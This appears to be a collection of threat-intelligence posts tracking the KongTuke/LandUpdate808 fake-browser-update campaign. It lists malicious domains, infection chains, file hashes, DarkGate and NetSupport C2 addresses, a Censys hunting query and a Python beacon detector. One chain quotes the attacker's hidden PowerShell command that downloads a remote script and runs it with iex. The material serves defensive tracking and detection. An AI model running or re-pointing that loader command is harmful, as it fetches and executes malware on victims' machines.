Latest #Kongtuke / #LandUpdate808 infra:
esaleerugs[.]com/e365r.js
ilsotto[.]com/n934rhj.js
nastictac[.]com/365h.js
#LandUpdate808 / #Kongtuke Update Chain:
Injected Website ->
hxxps[://]eliztalks[.]com/wp-config[.]js* ->
hxxps[://]eliztalks[.]com/js[.]php?device=windows&ip=<b64 ip>=&refferer=<b64 referrer>&browser=<b64 browser>&ua=<b64 user-agent>&domain=<b64 domain>&loc=<b64>=&is_ajax=1 ->
powershell -WindowStyle Hidden $global:block=curl -useb hxxp[://]robnzuwubz[.]top/1[.]php?s=527;iex $global:block[.]content ->
hxxp[://]cignjjgmdnbchhc[.]top:80/<random>.php?id=<host_name>&key=<check generated>&s=527

Likely next #Landupdate808 / #Kongtuke infra:
rshank[.]com

Still haven't been able to get a payload from the last reported infra, vicrin[.]com

Next likely #LandUpdate808 infra:
vicrin[.]com

Observed a new beginning part of the delivery chain for #LandUpdate808

hxxps[:]//mercro[.]com/web-metrics.js

Found in Silent Push. Can't get the next part yet.

https://urlscan.io/search/#mercro.com


I just don't use Censys as much as I should. Crafted something that does reasonably well at spotting #KongTuke #LandUpdate808 hosts.

services.http.response.body_hash="sha1:4cb2c207d5a9bb582aa3ddd06786d1afa0d8bada" and services.software.vendor=`Ubuntu`

https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=services.http.response.body_hash%3D%22sha1%3A4cb2c207d5a9bb582aa3ddd06786d1afa0d8bada%22+and+services.software.vendor%3D%60Ubuntu%60

Just wish there was a method to filter to just results with hostnames.

Looks to me like cloudy[.]zone will likely end up part of this threat.

@MalasadaTech

Latest #LandUpdate808 killchain observed today:
victim site
-->
pushcd[.]com/web-analyzer.js
-->
cloudflare[.]com/cdn-cgi/trace (checking IP info)
-->
pushcg[.]com/js.php?device=windows&ip=[IP INFO]&refferer=[REFERRER URL]&browser=chrome&ua=[USER AGENT]&domain=[C2 DOMAIN]&loc=VVM=&is_ajax=1
-->
contactsyracuse[.]org/wp-admin/js/qrtz.php
-->
upd_1794921.exe (2fa83a1f4b3196a87645d4e71c3a486c7eb433ccb462c85888d5a5dee2abe2e2)

Other stage 2 domain found:
dealmakerwealthsociety[.]com/wp-content/plugins/qartz.php

Darkgate Config:
Darkgate Version: 6.9.2
Campaign ID: new10oct
C2: 91.222.173[.]80
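Added detection example, not code from any of the posts above: the js.php check-in in both chains (the eliztalks one and the pushcg one) carries the same fixed set of query parameters with base64-encoded values (loc=VVM= decodes to "US", and the "refferer" misspelling is part of the shape). The Python below flags URLs with that parameter set in a plain-text proxy log and decodes the fields; the log lines, hostnames and the base64 values in them are constructed placeholders, not captured traffic.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Query parameters the js.php check-in carries (the "refferer" misspelling is part of the pattern).
BEACON_PARAMS = {"device", "ip", "refferer", "browser", "ua", "domain", "loc", "is_ajax"}
# Parameters sent base64-encoded; "browser" was base64 in one sighting and plain "chrome" in another.
B64_PARAMS = ("ip", "refferer", "browser", "ua", "domain", "loc")

def decode_b64(value):
    """Return the decoded text if value is clean base64 of printable text, else None."""
    try:
        padded = value + "=" * (-len(value) % 4)  # tolerate stripped padding
        text = base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return text if text and text.isprintable() else None

def match_beacon(url):
    """Return the decoded beacon fields if url has the js.php check-in shape, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/js.php"):
        return None
    query = parse_qs(parts.query, keep_blank_values=True)
    if not BEACON_PARAMS.issubset(query):  # all eight parameters must be present
        return None
    fields = {"host": parts.hostname, "device": query["device"][0], "is_ajax": query["is_ajax"][0]}
    for name in B64_PARAMS:
        fields[name] = decode_b64(query[name][0]) or query[name][0]  # keep raw if not base64
    return fields

def scan_proxy_log(lines):
    """Return (line_number, fields) for every log line whose URL matches the beacon shape."""
    hits = []
    for number, line in enumerate(lines, 1):
        for url in re.findall(r"https?://\S+", line):
            fields = match_beacon(url)
            if fields:
                hits.append((number, fields))
    return hits

# Constructed sample proxy log (not captured traffic); hostnames are placeholders.
SAMPLE_LOG = [
    "2024-10-10T12:00:01Z 10.0.0.5 GET https://www.example.test/ 200",
    "2024-10-10T12:00:02Z 10.0.0.5 GET https://stage1.example.test/js.php?device=windows"
    "&ip=MTAuMC4wLjU=&refferer=aHR0cHM6Ly92aWN0aW0udGVzdC8=&browser=chrome&ua=TW96aWxsYS81LjA="
    "&domain=YzIudGVzdA==&loc=VVM=&is_ajax=1 200",
    "2024-10-10T12:00:03Z 10.0.0.5 GET https://cdn.example.test/js.php?v=3 200",
]
```

`scan_proxy_log(SAMPLE_LOG)` returns only line 2, with the decoded fields (ip 10.0.0.5, loc US, referrer https://victim.test/); the benign js.php on line 3 is skipped because it lacks the parameter set.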

#LandUpdate808 domain found in research, not from anything injected into a compromised site.

greyspartners[.]com/analytics.js

As seen here:
https://urlscan.io/result/0503f332-9a1d-4371-a54a-4451dbfded79/#summary


Observed new #LandUpdate808 infection chain.

Compromised site:
-->
bretagne-balades[.]com/wp-includes/css/539.php (Update_#######.msix)
-->
45[.]11.59.217:443 (NetSupport, NSM301071)

4c2f8feced7768f756ac7d4fa633b08fd61f0ba198c860fa4f1093dedbf060d2 Update_#######.msix